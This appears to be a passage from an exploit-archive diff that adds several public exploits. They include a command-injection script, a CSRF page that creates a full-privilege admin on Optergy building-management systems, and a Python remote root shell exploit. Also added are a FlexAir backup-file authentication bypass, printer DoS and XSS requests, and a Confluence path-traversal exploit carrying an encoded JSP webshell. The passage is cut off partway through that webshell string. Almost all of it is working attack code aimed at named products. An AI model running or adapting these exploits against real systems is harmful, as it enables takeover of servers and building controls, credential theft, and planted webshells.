curl --silent --output /dev/null -X POST -d "${PAYLOAD}" "${HOST}/bin/sysfcgi.fx"
# Get output
echo "Output:"
curl -s "${HOST}/app/images/logos/output.txt"
# Remove temp file
echo "Removing temporary file.."
PAYLOAD="<requests><request name='LoginUser'><param name='UsrName' value='test'/><param name='UsrEMail' value='test@test.com'/><param name='GoogleAccessToken' value='test;rm /www/pages/app/images/logos/output.txt'/></request></requests>"
curl --silent --output /dev/null -X POST -d "${PAYLOAD}" "${HOST}/bin/sysfcgi.fx"
echo "Done"

160
exploits/hardware/webapps/47639.txt Normal file
View file

@ -0,0 +1,160 @@
# Title: Optergy 2.3.0a - Cross-Site Request Forgery (Add Admin)
# Author: LiquidWorm
# Date: 2019-11-05
# Vendor: https://optergy.com/
# Product web page: https://optergy.com/products/
# Affected version: <=2.3.0a
# Advisory: https://applied-risk.com/resources/ar-2019-008
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
# CVE: CVE-2019-7273
# Optergy Proton/Enterprise BMS CSRF Add Admin
<!-- CSRF Add Admin Exploit -->
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.232.19/controlPanel/ajax/UserManipulation.html?add" method="POST">
<input type="hidden" name="user.accountEnabled" value="true" />
<input type="hidden" name="user.username" value="testingus" />
<input type="hidden" name="user.password" value="testingus" />
<input type="hidden" name="confirmPassword" value="testingus" />
<input type="hidden" name="user.firstname" value="Tester" />
<input type="hidden" name="user.lastname" value="Testovski" />
<input type="hidden" name="user.companyName" value="TEST Inc." />
<input type="hidden" name="user.address" value="TestStr 17-251" />
<input type="hidden" name="user.emailAddress" value="aa@bb.cc" />
<input type="hidden" name="user.departmentId" value="" />
<input type="hidden" name="user.phoneNumber" value="1112223333" />
<input type="hidden" name="user.mobileNumber" value="1233211234" />
<input type="hidden" name="securityLevel" value="10" />
<input type="hidden" name="user.showBanner" value="true" />
<input type="hidden" name="user.showMenu" value="true" />
<input type="hidden" name="user.showAlarmTab" value="true" />
<input type="hidden" name="user.visibleAlarms" value="0" />
<input type="hidden" name="user.showBookmarks" value="true" />
<input type="hidden" name="user.showNotificationTab" value="true" />
<input type="hidden" name="user.autoDismissFeedback" value="true" />
<input type="hidden" name="user.canChangeBookmarks" value="true" />
<input type="hidden" name="user.canChangePassword" value="true" />
<input type="hidden" name="user.canUpdateProfile" value="true" />
<input type="hidden" name="homepage-text" value="" />
<input type="hidden" name="user.homePageType" value="" />
<input type="hidden" name="user.homePage" value="" />
<input type="hidden" name="background" value="" />
<input type="hidden" name="user.backgroundImage-text" value="" />
<input type="hidden" name="user.backgroundImage" value="" />
<input type="hidden" name="user.backgroundTiled" value="" />
<input type="hidden" name="user.backgroundColour" value="" />
<input type="hidden" name="newMemberships" value="1" />
<input type="hidden" name="user.id" value="" />
<input type="hidden" name="_sourcePage" value="/WEB-INF/jsp/controlPanel/UserAdministration.jsp" />
<input type="hidden" name="__fp" value="user.showBookmarks||user.showNotificationTab||user.emailSystemNotifications||user.addToSiteDirectory||user.showMenu||user.departmentId||user.showAlarmTab||user.smsAlarms||user.showBanner||accountExpires||user.autoDismissFeedback||user.changePasswordOnNextLogin||passwordExpires||user.showUserProfile||user.canUpdateProfile||user.canChangePassword||user.canChangeBookmarks||user.accountEnabled||" />
<input type="hidden" name="newPrivileges" value="7" />
<input type="hidden" name="newPrivileges" value="9" />
<input type="hidden" name="newPrivileges" value="8" />
<input type="hidden" name="newPrivileges" value="10" />
<input type="hidden" name="newPrivileges" value="13" />
<input type="hidden" name="newPrivileges" value="14" />
<input type="hidden" name="newPrivileges" value="12" />
<input type="hidden" name="newPrivileges" value="2" />
<input type="hidden" name="newPrivileges" value="3" />
<input type="hidden" name="newPrivileges" value="4" />
<input type="hidden" name="newPrivileges" value="139" />
<input type="hidden" name="newPrivileges" value="138" />
<input type="hidden" name="newPrivileges" value="141" />
<input type="hidden" name="newPrivileges" value="140" />
<input type="hidden" name="newPrivileges" value="124" />
<input type="hidden" name="newPrivileges" value="128" />
<input type="hidden" name="newPrivileges" value="119" />
<input type="hidden" name="newPrivileges" value="19" />
<input type="hidden" name="newPrivileges" value="17" />
<input type="hidden" name="newPrivileges" value="18" />
<input type="hidden" name="newPrivileges" value="20" />
<input type="hidden" name="newPrivileges" value="21" />
<input type="hidden" name="newPrivileges" value="24" />
<input type="hidden" name="newPrivileges" value="23" />
<input type="hidden" name="newPrivileges" value="132" />
<input type="hidden" name="newPrivileges" value="131" />
<input type="hidden" name="newPrivileges" value="134" />
<input type="hidden" name="newPrivileges" value="147" />
<input type="hidden" name="newPrivileges" value="25" />
<input type="hidden" name="newPrivileges" value="135" />
<input type="hidden" name="newPrivileges" value="105" />
<input type="hidden" name="newPrivileges" value="59" />
<input type="hidden" name="newPrivileges" value="142" />
<input type="hidden" name="newPrivileges" value="28" />
<input type="hidden" name="newPrivileges" value="27" />
<input type="hidden" name="newPrivileges" value="102" />
<input type="hidden" name="newPrivileges" value="31" />
<input type="hidden" name="newPrivileges" value="125" />
<input type="hidden" name="newPrivileges" value="30" />
<input type="hidden" name="newPrivileges" value="108" />
<input type="hidden" name="newPrivileges" value="129" />
<input type="hidden" name="newPrivileges" value="33" />
<input type="hidden" name="newPrivileges" value="34" />
<input type="hidden" name="newPrivileges" value="36" />
<input type="hidden" name="newPrivileges" value="37" />
<input type="hidden" name="newPrivileges" value="38" />
<input type="hidden" name="newPrivileges" value="46" />
<input type="hidden" name="newPrivileges" value="127" />
<input type="hidden" name="newPrivileges" value="41" />
<input type="hidden" name="newPrivileges" value="42" />
<input type="hidden" name="newPrivileges" value="45" />
<input type="hidden" name="newPrivileges" value="44" />
<input type="hidden" name="newPrivileges" value="49" />
<input type="hidden" name="newPrivileges" value="48" />
<input type="hidden" name="newPrivileges" value="112" />
<input type="hidden" name="newPrivileges" value="113" />
<input type="hidden" name="newPrivileges" value="117" />
<input type="hidden" name="newPrivileges" value="115" />
<input type="hidden" name="newPrivileges" value="116" />
<input type="hidden" name="newPrivileges" value="133" />
<input type="hidden" name="newPrivileges" value="51" />
<input type="hidden" name="newPrivileges" value="54" />
<input type="hidden" name="newPrivileges" value="56" />
<input type="hidden" name="newPrivileges" value="55" />
<input type="hidden" name="newPrivileges" value="66" />
<input type="hidden" name="newPrivileges" value="67" />
<input type="hidden" name="newPrivileges" value="60" />
<input type="hidden" name="newPrivileges" value="61" />
<input type="hidden" name="newPrivileges" value="62" />
<input type="hidden" name="newPrivileges" value="68" />
<input type="hidden" name="newPrivileges" value="69" />
<input type="hidden" name="newPrivileges" value="103" />
<input type="hidden" name="newPrivileges" value="104" />
<input type="hidden" name="newPrivileges" value="64" />
<input type="hidden" name="newPrivileges" value="65" />
<input type="hidden" name="newPrivileges" value="71" />
<input type="hidden" name="newPrivileges" value="121" />
<input type="hidden" name="newPrivileges" value="122" />
<input type="hidden" name="newPrivileges" value="85" />
<input type="hidden" name="newPrivileges" value="86" />
<input type="hidden" name="newPrivileges" value="74" />
<input type="hidden" name="newPrivileges" value="76" />
<input type="hidden" name="newPrivileges" value="144" />
<input type="hidden" name="newPrivileges" value="75" />
<input type="hidden" name="newPrivileges" value="77" />
<input type="hidden" name="newPrivileges" value="78" />
<input type="hidden" name="newPrivileges" value="79" />
<input type="hidden" name="newPrivileges" value="73" />
<input type="hidden" name="newPrivileges" value="143" />
<input type="hidden" name="newPrivileges" value="109" />
<input type="hidden" name="newPrivileges" value="110" />
<input type="hidden" name="newPrivileges" value="88" />
<input type="hidden" name="newPrivileges" value="89" />
<input type="hidden" name="newPrivileges" value="90" />
<input type="hidden" name="newPrivileges" value="118" />
<input type="hidden" name="newPrivileges" value="95" />
<input type="hidden" name="newPrivileges" value="93" />
<input type="hidden" name="newPrivileges" value="96" />
<input type="hidden" name="newPrivileges" value="94" />
<input type="hidden" name="newPrivileges" value="92" />
<input type="hidden" name="newPrivileges" value="98" />
<input type="hidden" name="newPrivileges" value="99" />
<input type="hidden" name="newPrivileges" value="146" />
<input type="hidden" name="newPrivileges" value="100" />
<input type="submit" value="Forgery" />
</form>
</body>
</html>

27
exploits/hardware/webapps/47640.txt Normal file
View file

@ -0,0 +1,27 @@
# Title: Optergy 2.3.0a - Username Disclosure
# Author: LiquidWorm
# Date: 2019-11-05
# Vendor: https://optergy.com/
# Product web page: https://optergy.com/products/
# Affected version: <=2.3.0a
# Advisory: https://applied-risk.com/resources/ar-2019-008
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
# CVE: CVE-2019-7272
# PoC:
curl -s http://192.168.232.19/Login.html?showReset=true | grep 'option value='
<option value="80">djuro</option>
<option value="99">teppi</option>
<option value="67">view</option>
<option value="3">alerton</option>
<option value="59">stef</option>
<option value="41">humba</option>
<option value="25">drmio</option>
<option value="11">de3</option>
<option value="56">andri</option>
<option value="6">myko</option>
<option value="22">dzonka</option>
<option value="76">kosto</option>
<option value="8">beebee</option>
<option value="1">Administrator</option>

83
exploits/hardware/webapps/47641.py Executable file
View file

@ -0,0 +1,83 @@
# Title: Optergy 2.3.0a - Remote Code Execution
# Author: LiquidWorm
# Date: 2019-11-05
# Vendor: https://optergy.com/
# Product web page: https://optergy.com/products/
# Affected version: <=2.3.0a
# Advisory: https://applied-risk.com/resources/ar-2019-008
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
# CVE: CVE-2019-7276
# PoC:
#!/usr/bin/env python
#
# Unauthenticated Remote Root Exploit in Optergy BMS (Console Backdoor)
#
# Affected version <=2.0.3a (Proton and Enterprise)
#
##############################################################################
#
# lqwrm@metalgear:~/stuff/optergy$ python getroot.py 192.168.232.19
# Challenge received: 1547540929287
# SHA1: 56a6e5bf103591ed45faa2159cae234d04f06d93
# MD5 from SHA1: 873efc9ca9171d575623a99aeda44e31
# Answer: 56a6e5bf103591ed45faa2159cae234d04f06d93873efc9ca9171d575623a99aeda44e31
# # id
# uid=0(root) gid=0(root) groups=0(root)
#
##############################################################################
#
#
import os#######
import sys######
import json#####
import hashlib##
import requests#
piton = os.path.basename(sys.argv[0])
if len(sys.argv) < 2:
print '\n\x20\x20[*] Usage: '+piton+' <ip:port>\n'
sys.exit()
while True:
challenge_url = 'http://'+sys.argv[1]+'/tools/ajax/ConsoleResult.html?get'
try:
req1 = requests.get(challenge_url)
get_challenge = json.loads(req1.text)
challenge = get_challenge['response']['message']
print 'Challenge received: ' + challenge
hash_object = hashlib.sha1(challenge.encode())
print 'SHA1: '+(hash_object.hexdigest())
h1 = (hash_object.hexdigest())
hash_object = hashlib.md5(h1.encode())
print 'MD5 from SHA1: '+(hash_object.hexdigest())
h2 = (hash_object.hexdigest())
print 'Answer: '+h1+h2
zeTargets = 'http://'+sys.argv[1]+'/tools/ajax/ConsoleResult.html'
zeCommand = raw_input('# ')
if zeCommand.strip() == 'exit':
sys.exit()
zeHeaders = {'User-Agent' : 'BB/BMS-251.4ev4h',
'Accept' : '*/*',
'Accept-Encoding' : 'gzip, deflate',
'Accept-Language' : 'mk-MK,mk;q=1.7',
'Connection' : 'keep-alive',
'Connection-Type' : 'application/x-www-form-urlencoded'}
zePardata = {'command' : 'sudo '+zeCommand,
'challenge' : challenge,
'answer' : h1+h2}
zeRequest = requests.post(zeTargets, headers=zeHeaders, data=zePardata)
get_resp = json.loads(zeRequest.text)
get_answ = get_resp['response']['message']
print get_answ
except Exception:
print '[*] Error!'
break

97
exploits/hardware/webapps/47644.py Executable file
View file

@ -0,0 +1,97 @@
# Exploit Title: FlexAir Access Control 2.3.35 - Authentication Bypass
# Google Dork: NA
# Date: 2019-11-11
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/
# Software Link: https://www.computrols.com/building-automation-software/
# Version: 2.3.35
# Tested on: NA
# CVE : CVE-2019-7666, CVE-2019-7667
# Advisory: https://applied-risk.com/resources/ar-2019-007
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
#!/usr/bin/env python
# -*- coding: utf8 -*-
#
# Prima FlexAir Access Control 2.3.35 Database Backup Predictable Name Exploit
# Authentication Bypass (Login with MD5 hash)
#
# Older versions: /links/Nova_Config_2019-01-03.bck
# Older versions: /Nova/assets/Nova_Config_2019-01-03.bck
# Newer versions: /links/Nova_Config_2019-01-03_13-53.pdb3
# Fixed versions: 2.4
#
###################################################################################
#
# lqwrm@metalgear:~/stuff/prima$ python exploitDB.py http://192.168.230.17:8080
# [+] Please wait while fetchin the backup config file...
# [+] Found some juice!
# [+] Downloading: http://192.168.230.17:8080/links/Nova_Config_2019-01-07.bck
# [+] Saved as: Nova_Config_2019-01-07.bck-105625.db
# lqwrm@metalgear:~/stuff/prima$ sqlite3 Nova_Config_2019-01-07.bck-105625.db
# SQLite version 3.22.0 2018-01-22 18:45:57
# Enter ".help" for usage hints.
# sqlite> select usrloginname,usrloginpassword from users where usrid in (1,2);
# superadmin|0dfcfa8cc7fd39d96ffe22dd406b5065
# sysadmin|1af01c4a5a4ec37f451a9feb20a0bbbe
# sqlite> .q
# lqwrm@metalgear:~/stuff/prima$
#
###################################################################################
#
# 11.01.2019
#
import os#######
import sys######
import time#####
import requests#
from datetime import timedelta, date
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
piton = os.path.basename(sys.argv[0])
if len(sys.argv) < 2:
print '[+] Usage: '+piton+' [target]'
print '[+] Target example 1: http://10.0.0.17:8080'
print '[+] Target example 2: https://primanova.tld\n'
sys.exit()
host = sys.argv[1]
def datum(start_date, end_date):
for n in range(int ((end_date - start_date).days)):
yield start_date + timedelta(n)
start_date = date(2017, 1, 1)
end_date = date(2019, 12, 30)
print '[+] Please wait while fetchin the backup config file...'
def spinning_cursor():
while True:
for cursor in '|/-\\':
yield cursor
spinner = spinning_cursor()
for mooshoo in datum(start_date, end_date):
sys.stdout.write(next(spinner))
sys.stdout.flush()
time.sleep(0.1)
sys.stdout.write('\b')
h = requests.get(host+'/links/Nova_Config_'+mooshoo.strftime('%Y-%m-%d')+'.bck', verify=False)
if (h.status_code) == 200:
print '[+] Found some juice!'
print '[+] Downloading: '+host+'/links/Nova_Config_'+mooshoo.strftime('%Y-%m-%d')+'.bck'
timestr = time.strftime('%H%M%S')
time.sleep(1)
open('Nova_Config_'+mooshoo.strftime('%Y-%m-%d')+'.bck-'+timestr+'.db', 'wb').write(h.content)
print '[+] Saved as: Nova_Config_'+mooshoo.strftime('%Y-%m-%d')+'.bck-'+timestr+'.db'
sys.exit()
print '[-] No backup for you today. :('

41
exploits/hardware/webapps/47648.txt Normal file
View file

@ -0,0 +1,41 @@
# Exploit Title: Bematech Printer MP-4200 - Denial of Service
# Date: 2019-11-11
# Exploit Author: Jonatas Fil
# Vendor Homepage: https://www.bematech.com.br/
# Software Link: https://www.bematech.com.br/produto/mp-4200-th/
# Version: MP-4200 TH
# Tested on: Windows and Linux
# CVE : N/A
DoS Poc:
--------------------------------------------------------------------------------------------------------
POST /en/conf_admin.html HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/73.0.3683.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,pt;q=0.8
Cache-Control: max-age=0
Referer: http://TARGET/en/conf_admin.html
Content-Length: 40
Content-Type: application/x-www-form-urlencoded
admin=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&person=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&SUBMIT_ADMIN=Submit
--------------------------------------------------------------------------------------------------------
XSS Poc:
--------------------------------------------------------------------------------------------------------
POST /en/conf_admin.html HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/73.0.3683.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,pt;q=0.8
Cache-Control: max-age=0
Referer: http://printer.com/en/conf_admin.html
Content-Length: 40
Content-Type: application/x-www-form-urlencoded
admin=%3C%2Ftd%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&person=%3C%2Ftd%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&SUBMIT_ADMIN=Submit

357
exploits/jsp/webapps/47621.py Executable file
View file

@ -0,0 +1,357 @@
# Exploit Title: Atlassian Confluence 6.15.1 - Directory Traversal
# Google Dork: N/A
# Date: 2019-11-11
# Exploit Author: max7253
# Vendor Homepage: https://www.atlassian.com
# Software Link: https://www.atlassian.com/software/confluence/download-archives
# Version: 6.15.1
# Tested on: Microsoft Windows 7 Enterprise, 6.1.7601 Service Pack 1 Build 7601, Linux 5.0.0-23-generic #24~18.04.1-Ubuntu
# CVE : 2019-3398
#Confluence Arbitrary File Write via Path Traversal (CVE-2019-3398)
#To use this exploit you should specify the following variables:
#OS - Linux or Windows.
#PROTO - http or https.
#USERNAME and PASSWORD - the login/password to log into the web interface of the Atlassian Confluence server.
#HOSTNAME - the domain name or IP address of the server and its port.
#ROOTFOLDER - the root directory of the web server. If the root directory is located in C:\confluence\pages\, set this variable to ROOTFOLDER = 'confluence/pages/'.
#Typical ROOTFOLDER locations are:
#Windows: Program Files/Atlassian/Confluence/confluence/pages/
#Linux: opt/atlassian/confluence/confluence/pages/
#Note that the root directory of the web server and the temporary directory of the Atlassian Confluence server on Windows must be on the same drive (C:\ in the example above).
#PAGEID - the pageId URL parameter you see in the browser address bar when you vist the Atlassian Confluence page where you have rights to upload files.
#For example, https://server.net/pages/viewpageattachments.action?pageId=111111111&metadataLink=true.
#If PAGEID is set to 0, the script will try to create a new Page ID in one of the available spaces. If it fails, it will try to create a new space and create a Page ID there.
#If PAGEID is not specified, the script will walk though the PAGEID_RANGE_START..PAGEID_RANGE_END range and try to upload shellcode till it succeeds.
#The script gets authenticated to the Atlassian Confluence server, retrieves the ATLASSIAN TOKEN from the server response, uploads the webshell, then imitates the 'Download all' action to place the webshell to the root directory of the web server.
#Tested on Atlassian v6.15.1. on Linux and Windows.
#Note that on Linux Confluence runs under the 'confluence' account which may not have rights to save files in the root directory of the web server. In this case the exploit will fail. Also, to create a new space and get the list of existing spaces the script makes use of Confluence REST API, which is available starting from Confluence Server 5.5.
import requests
import urllib3
import base64
from bs4 import BeautifulSoup
import numpy as np
import re
import json
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
OS = 'Windows' #change this parameter
PROTO = 'http' #change this parameter
USERNAME = 'test' #change this parameter
PASSWORD = 'test' #change this parameter
HOSTNAME = '192.168.198.144:8090' #change this parameter
ROOTFOLDER = 'Program Files/Atlassian/Confluence/confluence/pages/' #change this parameter (Windows)
#ROOTFOLDER = 'opt/atlassian/confluence/confluence/pages/' #change this parameter (Linux)
PAGEID = '0'#'1245201' #change this parameter
PAGEID_RANGE_START = np.int64(1) #change this parameter
PAGEID_RANGE_END = np.int64(999999999999) #change this parameter
ATLTOKEN = ''
LOGINURL = '%s://%s/dologin.action' % (PROTO, HOSTNAME)
UPLOADURL = '%s://%s/plugins/drag-and-drop/upload.action' % (PROTO, HOSTNAME)
DOWNLOADALLURL = '%s://%s/pages/downloadallattachments.action' % (PROTO, HOSTNAME)
CREATEPAGEURL = '%s://%s/pages/createpage.action?spaceKey=' % (PROTO, HOSTNAME)
VIEWSPACESURL= '%s://%s/rest/api/space' % (PROTO, HOSTNAME)
WEBSHELLURL = '%s://%s/pages/assist.jsp' % (PROTO, HOSTNAME)
SHELLCODE_WINDOWS = 'PCVAIHBhZ2UgaW1wb3J0PSJqYXZhLnV0aWwuKixqYXZhLmlvLiosamF2YS5uZXQuKiIlPgo8SFRNTD \
48Qk9EWT4KPEZPUk0gTUVUSE9EPSJQT1NUIiBOQU1FPSJib29raW5nIiBBQ1RJT049IiI+CjxJTlBV \
VCBUWVBFPSJ0ZXh0IiBOQU1FPSJjbWQiPgo8SU5QVVQgVFlQRT0ic3VibWl0IiBWQUxVRT0iU2VuZC \
I+CjwvRk9STT4gCjxwcmU+CjwlIApcdTAwNjlcdTAwNjZcdTAwMjBcdTAwMjhcdTAwNzJcdTAwNjVc \
dTAwNzFcdTAwNzVcdTAwNjVcdTAwNzNcdTAwNzRcdTAwMkVcdTAwNjdcdTAwNjVcdTAwNzRcdTAwNT \
BcdTAwNjFcdTAwNzJcdTAwNjFcdTAwNkRcdTAwNjVcdTAwNzRcdTAwNjVcdTAwNzJcdTAwMjhcdTAw \
MjJcdTAwNjNcdTAwNkRcdTAwNjRcdTAwMjJcdTAwMjlcdTAwMjBcdTAwMjFcdTAwM0RcdTAwMjBcdT \
AwNkVcdTAwNzVcdTAwNkNcdTAwNkNcdTAwMjlcdTAwMjBcdTAwN0JcdTAwMEFcdTAwMjBcdTAwMjBc \
dTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwNkZcdTAwNzVcdTAwNzRcdTAwMk \
VcdTAwNzBcdTAwNzJcdTAwNjlcdTAwNkVcdTAwNzRcdTAwNkNcdTAwNkVcdTAwMjhcdTAwMjJcdTAw \
NDNcdTAwNkZcdTAwNkRcdTAwNkRcdTAwNjFcdTAwNkVcdTAwNjRcdTAwM0FcdTAwMjBcdTAwMjJcdT \
AwMjBcdTAwMkJcdTAwMjBcdTAwNzJcdTAwNjVcdTAwNzFcdTAwNzVcdTAwNjVcdTAwNzNcdTAwNzRc \
dTAwMkVcdTAwNjdcdTAwNjVcdTAwNzRcdTAwNTBcdTAwNjFcdTAwNzJcdTAwNjFcdTAwNkRcdTAwNj \
VcdTAwNzRcdTAwNjVcdTAwNzJcdTAwMjhcdTAwMjJcdTAwNjNcdTAwNkRcdTAwNjRcdTAwMjJcdTAw \
MjlcdTAwMjBcdTAwMkJcdTAwMjBcdTAwMjJcdTAwNUNcdTAwNkVcdTAwM0NcdTAwNDJcdTAwNTJcdT \
AwM0VcdTAwMjJcdTAwMjlcdTAwM0JcdTAwMEFcdTAwMDlcdTAwNTNcdTAwNzRcdTAwNzJcdTAwNjlc \
dTAwNkVcdTAwNjdcdTAwNUJcdTAwNURcdTAwMjBcdTAwNjNcdTAwNkZcdTAwNkRcdTAwNkRcdTAwNj \
FcdTAwNkVcdTAwNjRcdTAwMjBcdTAwM0RcdTAwMjBcdTAwNkVcdTAwNjVcdTAwNzdcdTAwMjBcdTAw \
NTNcdTAwNzRcdTAwNzJcdTAwNjlcdTAwNkVcdTAwNjdcdTAwNUJcdTAwNURcdTAwMjBcdTAwN0JcdT \
AwMjJcdTAwNjNcdTAwNkRcdTAwNjRcdTAwMkVcdTAwNjVcdTAwNzhcdTAwNjVcdTAwMjJcdTAwMkNc \
dTAwMjBcdTAwMjJcdTAwMkZcdTAwNjNcdTAwMjJcdTAwMkNcdTAwMjBcdTAwNzJcdTAwNjVcdTAwNz \
FcdTAwNzVcdTAwNjVcdTAwNzNcdTAwNzRcdTAwMkVcdTAwNjdcdTAwNjVcdTAwNzRcdTAwNTBcdTAw \
NjFcdTAwNzJcdTAwNjFcdTAwNkRcdTAwNjVcdTAwNzRcdTAwNjVcdTAwNzJcdTAwMjhcdTAwMjJcdT \
AwNjNcdTAwNkRcdTAwNjRcdTAwMjJcdTAwMjlcdTAwN0RcdTAwM0JcdTAwMEFcdTAwMjBcdTAwMjBc \
dTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwNTBcdTAwNzJcdTAwNkZcdTAwNj \
NcdTAwNjVcdTAwNzNcdTAwNzNcdTAwMjBcdTAwNzBcdTAwMjBcdTAwM0RcdTAwMjBcdTAwNTJcdTAw \
NzVcdTAwNkVcdTAwNzRcdTAwNjlcdTAwNkRcdTAwNjVcdTAwMkVcdTAwNjdcdTAwNjVcdTAwNzRcdT \
AwNTJcdTAwNzVcdTAwNkVcdTAwNzRcdTAwNjlcdTAwNkRcdTAwNjVcdTAwMjhcdTAwMjlcdTAwMkVc \
dTAwNjVcdTAwNzhcdTAwNjVcdTAwNjNcdTAwMjhcdTAwNjNcdTAwNkZcdTAwNkRcdTAwNkRcdTAwNj \
FcdTAwNkVcdTAwNjRcdTAwMjlcdTAwM0JcdTAwMEFcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAw \
MjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwNEZcdTAwNzVcdTAwNzRcdTAwNzBcdTAwNzVcdTAwNzRcdT \
AwNTNcdTAwNzRcdTAwNzJcdTAwNjVcdTAwNjFcdTAwNkRcdTAwMjBcdTAwNkZcdTAwNzNcdTAwMjBc \
dTAwM0RcdTAwMjBcdTAwNzBcdTAwMkVcdTAwNjdcdTAwNjVcdTAwNzRcdTAwNEZcdTAwNzVcdTAwNz \
RcdTAwNzBcdTAwNzVcdTAwNzRcdTAwNTNcdTAwNzRcdTAwNzJcdTAwNjVcdTAwNjFcdTAwNkRcdTAw \
MjhcdTAwMjlcdTAwM0JcdTAwMEFcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdT \
AwMjBcdTAwMjBcdTAwNDlcdTAwNkVcdTAwNzBcdTAwNzVcdTAwNzRcdTAwNTNcdTAwNzRcdTAwNzJc \
dTAwNjVcdTAwNjFcdTAwNkRcdTAwMjBcdTAwNjlcdTAwNkVcdTAwMjBcdTAwM0RcdTAwMjBcdTAwNz \
BcdTAwMkVcdTAwNjdcdTAwNjVcdTAwNzRcdTAwNDlcdTAwNkVcdTAwNzBcdTAwNzVcdTAwNzRcdTAw \
NTNcdTAwNzRcdTAwNzJcdTAwNjVcdTAwNjFcdTAwNkRcdTAwMjhcdTAwMjlcdTAwM0JcdTAwMEFcdT \
AwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwNDRcdTAwNjFc \
dTAwNzRcdTAwNjFcdTAwNDlcdTAwNkVcdTAwNzBcdTAwNzVcdTAwNzRcdTAwNTNcdTAwNzRcdTAwNz \
JcdTAwNjVcdTAwNjFcdTAwNkRcdTAwMjBcdTAwNjRcdTAwNjlcdTAwNzNcdTAwMjBcdTAwM0RcdTAw \
MjBcdTAwNkVcdTAwNjVcdTAwNzdcdTAwMjBcdTAwNDRcdTAwNjFcdTAwNzRcdTAwNjFcdTAwNDlcdT \
AwNkVcdTAwNzBcdTAwNzVcdTAwNzRcdTAwNTNcdTAwNzRcdTAwNzJcdTAwNjVcdTAwNjFcdTAwNkRc \
dTAwMjhcdTAwNjlcdTAwNkVcdTAwMjlcdTAwM0JcdTAwMEFcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMj \
BcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwNTNcdTAwNzRcdTAwNzJcdTAwNjlcdTAwNkVcdTAw \
NjdcdTAwMjBcdTAwNjRcdTAwNjlcdTAwNzNcdTAwNzJcdTAwMjBcdTAwM0RcdTAwMjBcdTAwNjRcdT \
AwNjlcdTAwNzNcdTAwMkVcdTAwNzJcdTAwNjVcdTAwNjFcdTAwNjRcdTAwNENcdTAwNjlcdTAwNkVc \
dTAwNjVcdTAwMjhcdTAwMjlcdTAwM0JcdTAwMEFcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMj \
BcdTAwMjBcdTAwMjBcdTAwMjBcdTAwNzdcdTAwNjhcdTAwNjlcdTAwNkNcdTAwNjVcdTAwMjBcdTAw \
MjhcdTAwMjBcdTAwNjRcdTAwNjlcdTAwNzNcdTAwNzJcdTAwMjBcdTAwMjFcdTAwM0RcdTAwMjBcdT \
AwNkVcdTAwNzVcdTAwNkNcdTAwNkNcdTAwMjBcdTAwMjlcdTAwMjBcdTAwN0JcdTAwMEFcdTAwMjBc \
dTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMj \
BcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwNkZcdTAwNzVcdTAwNzRcdTAwMkVcdTAw \
NzBcdTAwNzJcdTAwNjlcdTAwNkVcdTAwNzRcdTAwNkNcdTAwNkVcdTAwMjhcdTAwNjRcdTAwNjlcdT \
AwNzNcdTAwNzJcdTAwMjlcdTAwM0JcdTAwMjBcdTAwNjRcdTAwNjlcdTAwNzNcdTAwNzJcdTAwMjBc \
dTAwM0RcdTAwMjBcdTAwNjRcdTAwNjlcdTAwNzNcdTAwMkVcdTAwNzJcdTAwNjVcdTAwNjFcdTAwNj \
RcdTAwNENcdTAwNjlcdTAwNkVcdTAwNjVcdTAwMjhcdTAwMjlcdTAwM0JcdTAwMjBcdTAwN0RcdTAw \
MEFcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwN0QKJT \
4KPC9wcmU+CjwvQk9EWT48L0hUTUw+'
SHELLCODE_LINUX ='PCVAIHBhZ2UgaW1wb3J0PSJqYXZhLnV0aWwuKixqYXZhLmlvLiosamF2YS5uZXQuKiIlPgo8SFRNTD \
48Qk9EWT4KPEZPUk0gTUVUSE9EPSJQT1NUIiBOQU1FPSJib29raW5nIiBBQ1RJT049IiI+CjxJTlBV \
VCBUWVBFPSJ0ZXh0IiBOQU1FPSJjbWQiPgo8SU5QVVQgVFlQRT0ic3VibWl0IiBWQUxVRT0iU2VuZC \
